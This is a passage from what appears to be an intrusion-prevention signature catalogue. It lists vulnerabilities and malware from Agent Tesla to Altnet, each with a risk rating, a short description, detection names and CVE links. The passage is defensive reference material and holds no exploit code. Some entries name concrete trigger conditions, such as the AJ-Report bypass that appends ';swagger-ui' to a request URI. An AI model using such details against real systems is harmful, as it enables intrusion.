Description: A vulnerability in Agent Tesla, version released prior to Sepetember 12, 2018, allows remote attackers to execute arbitrary code using command injection combined with an SQL injection, due to insufficient input validation to certain parameters.
Situation: HTTP_CS-Agent-Tesla-Panel-Remote-Code-Execution
Back to top

Agent-Tesla-SMTP-Traffic

About this vulnerability: Agent Tesla SMTP traffic was detected
Risk: High
First detected in: sgpkg-ips-1091-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Agent Tesla is a keystroke logger. It can send keystroke logs and screenshots from infected computers to remote servers using HTTP or SMTP protocol.
Situation: E-Mail_Agent-Tesla-SMTP-Traffic
Back to top

AgentX++-Receive-PDU-Integer-Overflow

About this vulnerability: A vulnerability in Frank Fock AgentX
Risk: High
First detected in: sgpkg-ips-303-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AgentX++
Type: Integer Overflow
Description: There is a buffer overflow vulnerability in Frank Fock AgentX++. The vulnerability is due to an integer overflow error in AgentX::receive_agentx function that can lead to a heap buffer overflow. A remote unauthenticated attacker can exploit this vulnerability by sending maximum payload length value in a packet to the target server on port 705/TCP. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the server process.
Situation: Generic_CS-AgentX++-Receive-PDU-Integer-Overflow
References:
CVE-2010-1319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1319
BID-39561
http://www.securityfocus.com/bid/39561
Back to top

Agilent-Technologies-Feature-Extraction-ActiveX-Index-Boundary-Error

About this vulnerability: A vulnerability in Agilent Technologies Feature Extraction
Risk: Low
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Agilent Technologies Feature Extraction
Type: Input Validation
Description: An index boundary error vulnerability exists in Agilent Technologies Feature Extraction. The vulnerability is due to insufficient input validation on a parameter of Insert() method of the AnnotationX.AnnList.1 ActiveX control. A remote unauthenticated attacker could exploit this vulnerability by enticing a target user to open a crafted web page. Successful exploitation could lead to arbitrary code execution in the context of the browser process.
Situation: File-Text_Agilent-Technologies-Feature-Extraction-ActiveX-Index-Boundary-Error
References:
CVE-2015-2092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2092
OSVDB-118992
http://www.osvdb.org/118992
Back to top

Agobot

About this vulnerability: AgoBot
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: AgoBot is a malware that creates a backdoor on the infected machine for a remote attacker to use. The infected machine can then be used for various malicious purposes.
Situation: File-Text_Agobot-Traffic
Back to top

Agora-Cgi-Cross-Site

About this vulnerability: Agora.cgi cross-site debug mode vulnerability
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Agora
Type: Insecure Configuration
Description: The Agora online shopping cart application can be exploited by creating links to malicious java scripts that are executed in the security context of the site. Agora must be set explicitly to debug mode by the administrator.
References:
CVE-2001-1199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1199
BID-3702
http://www.securityfocus.com/bid/3702
OSVDB-698
http://www.osvdb.org/698
Back to top

Ahsay-Backup-Insecure-File-Upload

About this vulnerability: A vulnerability in Ahsay Backup
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ahsay
Type: Insecure Configuration
Description: A vulnerability in Ahsay Backup, versions v7.x to v8.1.1.50, which allows remote attackers to upload arbitrary files into any directory on the server.
Situation: HTTP_CRH-Ahsay-Backup-Insecure-File-Upload
References:
CVE-2019-10267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10267
Back to top

Aim-Express-Usage

About this vulnerability: AIM Express usage
Risk: Moderate
First detected in: sgpkg-ips-129-2032
Last changed: sgpkg-ips-1555-5242
Platform: Generic
Software: AOL Instant Messenger
Type: Instant Messenger
Description: AIM Express is a web service which allows users to connect to other AOL Instant Messenger users through a web interface.
Back to top

AIM-Triton-CSeq-Buffer-Overflow

About this vulnerability: An AIM Triton CSeq Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-1720-5242
Platform: Generic
Software: AOL AIM Triton
Type: Buffer Overflow
Description: A buffer overflow vulnerability in AOL AIM Triton, version 1.0.4, which allows remote attackers to execute arbitrary code via a long CSeq field value in an INVITE message.
Situation: SIP-UDP_AIM-Triton-CSeq-Buffer-Overflow
References:
CVE-2006-3524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3524
BID-18906
http://www.securityfocus.com/bid/18906
OSVDB-27122
http://www.osvdb.org/27122
Back to top

Ainslot.b-Malware

About this vulnerability: Ainslot.B malware
Risk: High
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Ainslot.b is a Windows malware.
Situation: Generic_CS-Ainslot.b-Traffic
Generic_SS-Ainslot.b-Traffic
HTTP_CSU-Ainslot.b-Traffic
Back to top

Aiohttp-Directory-Traversal-CVE-2024-23334

About this vulnerability: A vulnerability in aiohttp
Risk: High
First detected in: sgpkg-ips-1705-5242
Last changed: sgpkg-ips-1705-5242
Platform: Generic
Software: aiohttp
Type: Malfunction
Description: A path traversal vulnerability has been reported in aiohttp versions before 3.9.2. An unauthenticated attacker can leverage this vulnerability to access arbitrary system files and obtain sensitive information such as passwords.
Situation: HTTP_CSU-Aiohttp-Directory-Traversal-CVE-2024-23334
References:
CVE-2024-23334
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23334
Back to top

AirTies-RT-104-Router-Unauthorized-Config-Download

About this vulnerability: A vulnerability in AirTies RT 104 routers
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AirTies RT 104 Router
Type: Malfunction
Description: There is a vulnerability in AirTies rt104 routers that allows unauthorized download of the router configuration.
Situation: HTTP_CSU-AirTies-RT-104-Router-Unauthorized-Config-Download
Back to top

AirTies-RT-Series-Routers-Hardcoded-Credentials-Vulnerability

About this vulnerability: A vulnerability in AirTies RT series routers
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AirTies RT Series Routers
Type: Malfunction
Description: Multiple AirTies RT series routers use hardcoded crentials.
Situation: HTTP_CSU-AirTies-RT-Series-Routers-Hardcoded-Credentials-Vulnerability
Back to top

AIS-logistics-ESEL-Server-RCE

About this vulnerability: A vulnerability in AIS logistics ESEL Server
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AIS logistics
Type: Input Validation
Description: A vulnerability in AIS logistics ESEL Server 67 which allows remote attackers to execute arbitrary code by way of SQL injection, due to improper authentication and sanitization of input.
Situation: Generic_CS-AIS-logistics-ESEL-Server-RCE
References:
CVE-2019-10123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10123
Back to top

AIX-Rlogin-Froot

About this vulnerability: Malfunction in Aix login allows remote root
Risk: High
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: <os>
Type: Buffer Overflow
Description: A serious security vulnerability in rlogin daemon exists in certain older unix systems. The vulnerability allows remote login to the vulnerable without passwd.
Situation: RLOGIN_Froot-Remote-Compromise
References:
CVE-1999-0113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0113
BID-458
http://www.securityfocus.com/bid/458
Back to top

AJ-Report-Authentication-Bypass-CVE-2024-7314

About this vulnerability: A vulnerability in AJ-Report
Risk: High
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Platform: Generic
Software: AJ-Report
Type: Input Validation
Description: A vulnerability in anji-plus AJ-Report server 1.4.0 allows a remote attacker to bypass authentication by appending ;swagger-ui to the request URI. This vulnerability can be combined with a Nashorn engine security filter bypass for unauthenticated remote code execution.
Situation: HTTP_CRL-AJ-Report-Remote-Code-Execution-CVE-2024-7314
HTTP_CRL-AJ-Report-Potential-Authentication-Bypass-CVE-2024-7314
References:
CVE-2024-7314
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7314
Back to top

AjaxPro-Deserialization-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in AjaxPro detected
Risk: High
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Windows
Software: AjaxPro
Type: Input Validation
Description: A vulnerability in AjaxPro, versions 21.10.30.1 and before, which allows remote attackers to execute arbitrary code due to an insecure deserialization of data.
Situation: HTTP_CRL-AjaxPro-Deserialization-Remote-Code-Execution
References:
CVE-2021-23758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23758
Back to top

Ajenti-Auth-Username-Command-Injection

About this vulnerability: A vulnerability in Ajenti
Risk: High
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Ajenti
Type: Code Injection
Description: There exists a vulnerability in Ajenti, version 2.1.31, which allows remote attackers to execute arbitrary code due to unsufficient sanitization of the username parameter in a POST to /api/core/auth.
Situation: HTTP_CRL-Ajenti-Auth-Username-Command-Injection
Back to top

Al3na.hotgirls-Botnet

About this vulnerability: Al3na.hotgirls botnet
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Al2na.hotgirls is an IRC-controlled botnet.
Situation: Generic_SS-Botnet-Al3na.hotgirls-Activity
Back to top

Al3na.monster-Botnet

About this vulnerability: Al3na.monster botnet
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Als3na.monster is an IRC-controlled botnet.
Situation: Generic_SS-Botnet-Al3na.monster-Activity
Back to top

Al3na.weakpatheticfool-Botnet

About this vulnerability: Al3na.weakpatheticfool botnet
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Al3na.weakpatheticfool is an IRC-controlled botnet.
Situation: Generic_CS-Botnet-Al3na.weakpatheticfool-Activity
Generic_SS-Botnet-Al3na.weakpatheticfool-Activity
Back to top

Alcatel-OmniPCX-Enterprise-Remote-Command-Execution

About this vulnerability: An Alcatel OmniPCX Enterprise Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Alcatel OmniPCX Enterprise
Type: Input Validation
Description: A vulnerability in Alcatel OmniPCX Enterprise, versions R7.1 and earlier, which allows remote attackers to execute arbitrary commands via shell metacharacters in the user parameter during a ping action.
Situation: HTTP_CSU_Alcatel-OmniPCX-Enterprise-Remote-Command-Execution
References:
CVE-2007-3010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3010
BID-25694
http://www.securityfocus.com/bid/25694
OSVDB-40521
http://www.osvdb.org/40521
Back to top

Aldi-Bot

About this vulnerability: Aldi Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Aldi is a Bot that is used for performing Distributed Denial of Service (DDoS) attacks.
Situation: HTTP_CSU-Aldi-Bot-Traffic
HTTP_CSH-Aldi-Bot-Traffic
Back to top

Alibaba-Nacos-Authfilter-Authentication-Bypass

About this vulnerability: A vulnerability in Alibaba Nacos
Risk: Moderate
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Platform: Generic
Software: Alibaba Nacos
Type: Malfunction
Description: A backdoor that in Nacos servers allows a remote attacker to bypass authentication checks to gain access to endpoints that normally require authentication.
Situation: HTTP_CS-Alibaba-Nacos-Authfilter-Authentication-Bypass
References:
CVE-2021-29441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29441
Back to top

Alibaba-Nacos-ConfigOpsController-Authentication-Bypass

About this vulnerability: A vulnerability in Alibaba Nacos.
Risk: High
First detected in: sgpkg-ips-1375-5242
Last changed: sgpkg-ips-1375-5242
Platform: Generic
Software: Alibaba Nacos
Type: Insecure Configuration
Description: A vulnerability in Alibaba Nacos, versions prior to 1.4.1, which allows remote attackers to disclose sensitive information by sending a crafted request to the target server, due to missing authentication controls on the /derby path of ConfigOpsController.
Situation: HTTP_CS-Alibaba-Nacos-ConfigOpsController-Authentication-Bypass
References:
CVE-2021-29442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29442
Back to top

Alienvault-Ossim-Arbitrary-Command-Injection

About this vulnerability: A vulnerability in AlienVault AlienVault OSSIM
Risk: Moderate
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AlienVault AlienVault
Type: Input Validation
Description: An arbitrary command injection vulnerability has been reported in AlienVault OSSIM. The vulnerability is due to insufficient validation of the password. A remote, authenticated attacker can exploit this vulnerability by sending maliciously crafted input to the affected server. This can result in arbitrary command execution with SYSTEM privileges.
Situation: HTTP_CRL-Alienvault-Ossim-Arbitrary-Command-Injection
HTTPS_CS-Alienvault-Ossim-Arbitrary-Command-Injection
HTTPS_CS-Alienvault-Ossim-Arbitrary-Command-Injection-2
Back to top

Alienvault-Ossim-AV-Centerd-Soap-Requests-Multiple-Command-Execution

About this vulnerability: A vulnerability in AlienVault AlienVault
Risk: Moderate
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: AlienVault AlienVault
Type: Input Validation
Description: Multiple command execution vulnerabilities exist in AlienVault OSSIM. The vulnerabilities are due to failure to safely sanitize user data while handling av-centerd SOAP service requests. A remote unauthenticated attacker can exploit these vulnerabilities by sending crafted requests to affected service. Successful exploitation could result in arbitrary command execution with root privileges.
Situation: File-TextId_Alienvault-Ossim-AV-Centerd-Soap-Requests-Multiple-Command-Execution
References:
CVE-2014-3804
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3804
OSVDB-106816
http://www.osvdb.org/106816
Back to top

Alienvault-Ossim-AV-Centerd-Util.pm-Get_License-Arbitrary-Command-Execution

About this vulnerability: A vulnerability in AlienVault AlienVault
Risk: High
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: AlienVault AlienVault
Type: Input Validation
Description: An arbitrary command execution vulnerability exists in AlienVault OSSIM. The vulnerability is due to a failure to safely sanitize user data while handling SOAP service requests via the get_license function of Util.pm. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected service. Successful exploitation could result in arbitrary command execution with root privileges.
Situation: HTTP_CS-Alienvault-Ossim-AV-Centerd-Util.pm-Get_License-Arbitrary-Command-Execution
References:
CVE-2014-3805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3805
OSVDB-108008
http://www.osvdb.org/108008
Back to top

Alienvault-Ossim-AV-Centerd-Util.pm-Remote_Task-Arbitrary-Command-Execution

About this vulnerability: A vulnerability in AlienVault AlienVault
Risk: High
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: AlienVault AlienVault
Type: Input Validation
Description: An arbitrary command execution vulnerability exists in AlienVault OSSIM. The vulnerability is due to a failure to safely sanitize remote_task SOAP requests within Util.pm. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected service. Successful exploitation could result in arbitrary command execution with root privileges.
Situation: File-TextId_Alienvault-Ossim-AV-Centerd-Util.pm-Remote_Task-Arbitrary-Command-Execution
References:
CVE-2014-5210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5210
BID-69239
http://www.securityfocus.com/bid/69239
OSVDB-109581
http://www.osvdb.org/109581
Back to top

Alienvault-Ossim-AV-Centerd-Util.pm-Request-Arbitrary-Command-Execution

About this vulnerability: A vulnerability in AlienVault AlienVault
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AlienVault AlienVault
Type: Input Validation
Description: An arbitrary command execution vulnerability exists in AlienVault OSSIM. The vulnerability is due to a failure to safely sanitize user data while handling SOAP requests via Util.pm. A remote unauthenticated attacker can exploit this vulnerability by sending crafted requests to the affected service. Successful exploitation could result in arbitrary command execution with root privileges.
Situation: HTTP_CS-Alienvault-Ossim-AV-Centerd-Util.pm-Request-Arbitrary-Command-Execution
References:
CVE-2014-3805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3805
OSVDB-107993
http://www.osvdb.org/107993
Back to top

Alienvault-Ossim-Framework-Backup-Command-Execution

About this vulnerability: A vulnerability in AlienVault AlienVault
Risk: Moderate
First detected in: sgpkg-ips-612-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AlienVault AlienVault
Type: Input Validation
Description: A command execution vulnerability exists in AlienVault OSSIM Framework. The vulnerability is due to insufficient sanitization of user supplied data that is used to execute backup commands. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable server. Successful exploitation could result in command execution with root privileges.
Situation: Generic_CS-Alienvault-Ossim-Framework-Backup-Command-Execution
References:
CVE-2014-5158
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5158
BID-68998
http://www.securityfocus.com/bid/68998
OSVDB-109579
http://www.osvdb.org/109579
Back to top

Alienvault-Unified-Security-Management-And-Ossim-Gauge.php-SQL-Injection

About this vulnerability: A vulnerability in AlienVault OSSIM
Risk: High
First detected in: sgpkg-ips-820-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AlienVault OSSIM; AlienVault Unified Security Management
Type: Input Validation
Description: There exists an SQL injection vulnerability in Alienvault Unified Security Management and OSSIM. A remote attacker can use this to execute arbitrary SELECT commands against the database.
Situation: HTTP_CRL-Alienvault-Unified-Security-Management-And-Ossim-Gauge.php-SQL-Injection
References:
CVE-2016-8582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8582
Back to top

Alienvault-Unified-Security-Management-AV-Remote-Code-Execution

About this vulnerability: A vulnerability in AlienVault Unified Security Management
Risk: High
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: AlienVault Unified Security Management
Type: Malfunction
Description: There exists a remote code execution vulnerability in AlienVault Unified Security Management. A remote attacker can use this to execute arbitrary code in the context of the process user.
Situation: Generic_CS-Alienvault-Unified-Security-Management-AV-Forward-Deserialization-Remote-Code-Execution
Back to top

Alienvault-USM/OSSIM-Unauthenticated-Command-Injection

About this vulnerability: Alienvault USM/OSSIM Unauthenticated Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-932-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: AlienVault OSSIM; AlienVault Unified Security Management
Type: Code Injection
Description: An unauthenticated command injection vulnerability in Alienvault USM/OSSIM, versions 5.3.4 and 5.3.5, which allows remote attackers to pass user input directly to a system call as root.
Situation: HTTP_CRL-Alienvault-USM/OSSIM-Unauthenticated-Command-Injection
HTTP_CRL-Alienvault-USM/OSSIM-Unauthenticated-Command-Injection-2
Back to top

Allegra-Excel-Import-Insecure-Deserialization

About this vulnerability: A vulnerability in Allegra
Risk: Moderate
First detected in: sgpkg-ips-1699-5242
Last changed: sgpkg-ips-1699-5242
Platform: Generic
Software: Allegra
Type: Malfunction
Description: A design weakness of the Excel import functionality causes an insecure deserialization vulnerability in Allegra. A successful exploitation allows an attacker to execute code on the target system.
Situation: HTTP_CS-Allegra-Excel-Import-Insecure-Deserialization
References:
CVE-2024-22506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22506
Back to top

Allegra-Ganttandschexportaction-Directory-Traversal

About this vulnerability: A vulnerability in Allegra
Risk: High
First detected in: sgpkg-ips-1706-5242
Last changed: sgpkg-ips-1706-5242
Platform: Generic
Software: Allegra
Type: Input Validation
Description: A directory traversal vulnerability has been reported in Allegra. The vulnerability is due to improper validation of request parameters. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in reading arbitrary files on the target filesystem.
Situation: HTTP_CRL-Allegra-Ganttandschexportaction-Directory-Traversal
References:
CVE-2023-22361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22361
Back to top

Allegra-Getfilecontentasstring-Directory-Traversal

About this vulnerability: A vulnerability in Allegra Allegra
Risk: High
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1708-5242
Platform: Generic
Software: Allegra
Type: Input Validation
Description: A directory traversal vulnerability has been reported in Allegra. The vulnerability is due to improper validation of loadJavaScript.action request parameters. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in reading arbitrary files on the target filesystem.
Situation: HTTP_CRL-Allegra-Getfilecontentasstring-Directory-Traversal
References:
CVE-2024-22530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22530
Back to top

Allegra-Siteconfigaction-Improper-Access-Control

About this vulnerability: A vulnerability in Allegra
Risk: High
First detected in: sgpkg-ips-1734-5242
Last changed: sgpkg-ips-1734-5242
Platform: Generic
Software: Allegra
Type: Malfunction
Description: An improper access control vulnerability has be reported in Allegra. The vulnerability is due to misconfiguration of an endpoint. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in in code execution.
Situation: HTTP_CSU-Allegra-Siteconfigaction-Improper-Access-Control
References:
CVE-2024-22512
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22512
Back to top

Allen-Bradley-PCCC-Protocol-DoS

About this vulnerability: A vulnerability in Allen-Bradley's Legacy PCCC Protocol.
Risk: High
First detected in: sgpkg-ips-1425-5242
Last changed: sgpkg-ips-1425-5242
Platform: Generic
Software: Allen Bradley
Type: Malfunction
Description: A vulnerability in Allen-Bradley's Legacy PCCC Protocol, affecting MicroLogix 1100 controllers 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and 1763-L16DWD, which allows remote attackers to cause a denial of service condition by sending a crafted Programmable Controller Communication Commands (PCCC) packet to the target controller.
Situation: Generic_CS-Allen-Bradley-PCCC-Protocol-DoS
References:
CVE-2017-7924
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7924
Back to top

Allied-Telesyn-TFTP-Server-Buffer-Overflow

About this vulnerability: Allied Telesyn TFTP Server 1.9 Buffer Overflow
Risk: High
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Allied Telesyn TFTP
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Allied Telesyn TFTP Server 1.9 which allows remote attackers to execute arbitrary code, or cause a denial of service condition, via a long filename
Situation: TFTP_Read-Or-Write-Request-Excessively-Long-Filename
References:
CVE-2006-6184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6184
BID-21320
http://www.securityfocus.com/bid/21320
OSVDB-11350
http://www.osvdb.org/11350
Back to top

ALLMediaServer-SEH-Buffer-Overflow

About this vulnerability: A vulnerability in ALLMediaServer.
Risk: High
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Platform: Windows
Software: ALLMediaServer
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability in ALLMediaServer, version 1.6, which allows remote attackers to execute arbitrary code by sending a crafted request, due to a boundary error within the handling of a HTTP request.
Situation: Generic_CS-ALLMediaServer-SEH-Buffer-Overflow
References:
CVE-2022-28381
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28381
Back to top

Alpha-Networks-ASL-26555-Wireless-Router-Password-Disclosure

About this vulnerability: A vulnerability in Alpha Networks ASL-26555 Wireless Router
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Alpha Networks ASL-26555 Wireless Router
Type: Malfunction
Description: There is a password disclosure vulnerability in Alpha Networks ASL-26555 wireless router. The vulnerability is due to a design error.
Situation: HTTP_CSU-Alpha-Networks-ASL-26555-Wireless-Router-Password-Disclosure
HTTP_CSU-Alpha-Networks-ASL-26555-Wireless-Router-Undocumented-API-Call
References:
BID-55092
http://www.securityfocus.com/bid/55092
Back to top

Alt-N-MDaeamon-Buffer-Overflow-Vulnerability

About this vulnerability: A vulnerability in Alt-N MDaeamon
Risk: High
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Alt-N MDaeamon
Type: Buffer Overflow
Description: A Buffer Overflow vulnerability exists in Alt-N MDaeamon. A successful exploit could allow the attacker to execute arbitrary code on the affected system.
Situation: HTTP_CRL-Alt-N-MDaeamon-Buffer-Overflow-Vulnerability
Back to top

Alt-N-MDaemon-IMAP-Server-Fetch-Command-Buffer-Overflow

About this vulnerability: A vulnerability in Alt-N Technologies MDaemon
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MDaemon
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in the way Alt-N MDaemon Server handles IMAP requests. The vulnerability is due to lack of boundary protection while processing IMAP FETCH commands. A remote authenticated attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code on the vulnerable system within the security context of the affected service, normally System. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, normally System. In an attack case where code injection is not successful, the affected server will terminate and reset all established connections.
Situation: IMAP_CS-Alt-N-MDaemon-IMAP-Server-Fetch-Command-Buffer-Overflow
References:
CVE-2008-1358
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1358
BID-28245
http://www.securityfocus.com/bid/28245
Back to top

Alt-N-MDaemon-Worldclient-Service-Memory-Corruption

About this vulnerability: A vulnerability in Alt-N Technologies MDaemon
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MDaemon
Type: Malfunction
Description: There is a memory corruption vulnerability in Alt-N Technologies MDaemon WorldClient. The vulnerability is due to a NULL pointer dereference in processing a malicious HTTP POST request. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server, causing the server to crash thereby resulting in a denial of service. Upon processing malicious HTTP POST messages, the WorldClient process will terminate, which triggers a Denial of Service condition. Note that this process automatically restarts to resume the normal operation.
Situation: Generic_CS-Alt-N-MDaemon-Worldclient-Service-Memory-Corruption
References:
CVE-2008-2631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2631
Back to top

Alt-N-Technologies-SecurityGateway-Usename-BOF

About this vulnerability: Buffer overflow allows remote code execution
Risk: High
First detected in: sgpkg-ips-208-2032
Last changed: sgpkg-ips-1589-5242
Platform: Windows
Software: Alt-N SecurityGateway
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Alt-N Technologies SecurityGateway. The vulnerability allows a remote unauthenticated attacker to cause a denial of service or to execute arbitrary code with the privileges of the affected service, normally System.
Situation: HTTP_CRL-Alt-N-Technologies-SecurityGateway-Usename-BOF
References:
CVE-2008-4193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4193
BID-29457
http://www.securityfocus.com/bid/29457
OSVDB-45854
http://www.osvdb.org/45854
Back to top

Alt-N-Technologies-SecurityGateway-Username-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Alt-N Technologies SecurityGateway
Risk: High
First detected in: sgpkg-ips-156-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Alt-N SecurityGateway
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Alt-N Technologies SecurityGateway. The vulnerability allows a remote unauthenticated attacker to cause a denial of service or to execute arbitrary code with the privileges of the affected service, normally System.
References:
OSVDB-45854
http://www.osvdb.org/45854
Back to top

Alt-N-WebAdmin-User-Parameter-BOF

About this vulnerability: Buffer overflow in Alt-N WebAdmin
Risk: High
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1589-5242
Platform: Windows
Software: Alt-N WebAdmin
Type: Buffer Overflow
Description: Alt-N WebAdmin is vulnerable to a buffer overflow in the USER parameter of the webadmin.exe script. By default, webadmin.exe is started as a system service. By sending an overly long string to the USER parameter, a remote attacker can overflow the buffer and execute arbitrary code with system privileges.
Situation: HTTP_CRL-Alt-N-WebAdmin-User-Parameter-BOF
References:
CVE-2003-0471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0471
BID-8024
http://www.securityfocus.com/bid/8024
OSVDB-2207
http://www.osvdb.org/2207
Back to top

Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Altnet Download Manager
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Altnet Download Manager; Kazaa; Grokster
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the Altnet Download Manager ADM4 ActiveX control. The vulnerability is due to an error in a particular method exposed by the ActiveX control. A particular setup parameter suffers insufficient input validation. An exploitation may lead to arbitrary code execution in the context of the current user.
Situation: HTTP_SS-Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow
File-Text_Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-5217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5217
BID-25903
http://www.securityfocus.com/bid/25903
OSVDB-38435
http://www.osvdb.org/38435
Back to top

Altnet-Peer-Points-Manager

About this vulnerability: Altnet Peer Points Manager
Risk: Low
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1296-5242
